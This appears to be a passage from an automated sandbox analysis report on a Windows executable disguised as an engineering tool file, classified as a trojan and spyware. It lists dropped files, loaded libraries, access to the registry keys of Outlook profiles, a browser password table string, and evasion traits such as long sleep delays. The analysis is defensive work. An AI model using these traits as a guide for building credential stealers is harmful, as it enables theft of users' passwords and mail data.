            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_38CAF66811_2_38CAF668
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_38CA182811_2_38CA1828
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_38CAF98811_2_38CAF988
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_38CA7FA811_2_38CA7FA8
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_38CAB4C811_2_38CAB4C8
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_38CA82C811_2_38CA82C8
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_38CAE6C811_2_38CAE6C8
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_38CA82C011_2_38CA82C0
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_38CAD0E811_2_38CAD0E8
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_38CA9EE811_2_38CA9EE8
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_38CA04F811_2_38CA04F8
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_38CABAF911_2_38CABAF9
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_38CAECF911_2_38CAECF9
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_38CA88FE11_2_38CA88FE
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_38CAE08811_2_38CAE088
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_38CAAE8811_2_38CAAE88
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_38CA0E9811_2_38CA0E98
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_38CA989811_2_38CA9898
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_38CACA9811_2_38CACA98
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_38CA0E9211_2_38CA0E92
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_38CAFCA811_2_38CAFCA8
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_38CACAA811_2_38CACAA8
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_38CA98A811_2_38CA98A8
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_38CAE6BB11_2_38CAE6BB
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_38CAA84811_2_38CAA848
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_38CADA4811_2_38CADA48
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_38CA004011_2_38CA0040
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_38CADA4011_2_38CADA40
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_38CA925811_2_38CA9258
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_38CAC45711_2_38CAC457
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_38CAC46811_2_38CAC468
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Code function: String function: 00402A3A appears 52 times
            Source: SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 00000000.00000002.1493366542.0000000000438000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenamefreedoms solitrringenes.exeDVarFileInfo$ vs SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe
            Source: SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5974467463.0000000070CBB000.00000020.00000001.01000000.0000000C.sdmp Binary or memory string: OriginalFilenameSystem.Windows.Forms.dllT vs SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe
            Source: SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5944704499.0000000000438000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenamefreedoms solitrringenes.exeDVarFileInfo$ vs SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe
            Source: SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
            Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@3/9@5/5
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Code function: 0_2_004030D9 EntryPoint,SetErrorMode,GetVersion,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,LdrInitializeThunk,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,LdrInitializeThunk,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Code function: 11_2_004030D9 EntryPoint,SetErrorMode,GetVersion,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,LdrInitializeThunk,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,LdrInitializeThunk,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Code function: 0_2_00404320 GetDlgItem,SetWindowTextA,LdrInitializeThunk,LdrInitializeThunk,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,LdrInitializeThunk,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Code function: 0_2_0040205E LdrInitializeThunk,CoCreateInstance,MultiByteToWideChar,LdrInitializeThunk
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe File created: C:\Users\user\falden
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Mutant created: NULL
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe File created: C:\Users\user\AppData\Local\Temp\nss2FBA.tmp
            Source: SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe File read: C:\Users\desktop.ini
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
            Source: SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5968030278.0000000036406000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe ReversingLabs: Detection: 55%
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe File read: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe
            Source: unknown Process created: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe "C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe"
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Process created: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe "C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe"
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Process created: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe "C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe"
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeSection loaded: edgegdi.dllJump to behavior
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeSection loaded: shfolder.dllJump to behavior
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeSection loaded: riched20.dllJump to behavior
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeSection loaded: usp10.dllJump to behavior
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeSection loaded: msls31.dllJump to behavior
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeSection loaded: textinputframework.dllJump to behavior
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeSection loaded: coreuicomponents.dllJump to behavior
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeSection loaded: coremessaging.dllJump to behavior
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeSection loaded: textshaping.dllJump to behavior
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeSection loaded: edgegdi.dllJump to behavior
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeSection loaded: schannel.dllJump to behavior
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeSection loaded: mskeyprotect.dllJump to behavior
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeSection loaded: ntasn1.dllJump to behavior
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeSection loaded: ncrypt.dllJump to behavior
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeSection loaded: ncryptsslp.dllJump to behavior
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeSection loaded: rasapi32.dllJump to behavior
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeSection loaded: rasman.dllJump to behavior
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeSection loaded: rtutils.dllJump to behavior
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeSection loaded: dhcpcsvc6.dllJump to behavior
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeSection loaded: dhcpcsvc.dllJump to behavior
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeFile written: C:\Users\user\hanknsordet.iniJump to behavior
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
            Source: SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: Binary string: System.Windows.Forms.pdb source: SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5974467463.00000000717DB000.00000020.00000001.01000000.0000000C.sdmp
            Source: Binary string: System.Windows.Forms.ni.pdbRSDS source: SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5974467463.00000000717DB000.00000020.00000001.01000000.0000000C.sdmp
            Source: Binary string: System.Windows.Forms.ni.pdb source: SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5974467463.00000000717DB000.00000020.00000001.01000000.0000000C.sdmp

            Data Obfuscation

            Source: Yara matchFile source: 00000000.00000002.1494958612.000000000597D000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.1493431079.0000000000507000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.1493431079.0000000000515000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe PID: 8984, type: MEMORYSTR
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 0_2_10001A5D GlobalAlloc,lstrcpyA,lstrcpyA,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyA,GetModuleHandleA,LoadLibraryA,GetProcAddress,lstrlenA,0_2_10001A5D
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 0_2_10002D20 push eax; ret 0_2_10002D4E
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_3_0019CFBE push eax; iretd 11_3_0019CFC5
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_3_0019C348 push eax; ret 11_3_0019C349
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeFile created: \sm-0230- j - tool 10 degree for dwt machine-mf5i.exe
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeFile created: C:\Users\user\AppData\Local\Temp\nsz3421.tmp\System.dllJump to dropped file
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeAPI/Special instruction interceptor: Address: 6242F29
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeAPI/Special instruction interceptor: Address: 2A72F29
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeMemory allocated: 110000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeMemory allocated: 361E0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeMemory allocated: 36130000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeThread delayed: delay time: 600000Jump to behavior
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsz3421.tmp\System.dllJump to dropped file
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeAPI coverage: 0.2 %
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe TID: 4992Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe TID: 4992Thread sleep time: -600000s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 0_2_00406001 FindFirstFileA,FindClose,0_2_00406001
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 0_2_0040559F GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,0_2_0040559F
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 0_2_00402688 FindFirstFileA,0_2_00402688
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_00406001 FindFirstFileA,FindClose,11_2_00406001
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_00402688 FindFirstFileA,11_2_00402688
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_0040559F GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,11_2_0040559F
            Source: SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5957730612.0000000005938000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWh
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeAPI call chain: ExitProcess graph end nodegraph_0-4700
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeAPI call chain: ExitProcess graph end nodegraph_0-4707
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 0_2_00401751 lstrcatA,CompareFileTime,LdrInitializeThunk,SetFileTime,CloseHandle,lstrcatA,0_2_00401751
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 0_2_10001A5D GlobalAlloc,lstrcpyA,lstrcpyA,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyA,GetModuleHandleA,LoadLibraryA,GetProcAddress,lstrlenA,0_2_10001A5D
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeMemory allocated: page read and write | page guardJump to behavior
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeProcess created: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe "C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe"Jump to behavior
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeQueries volume information: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
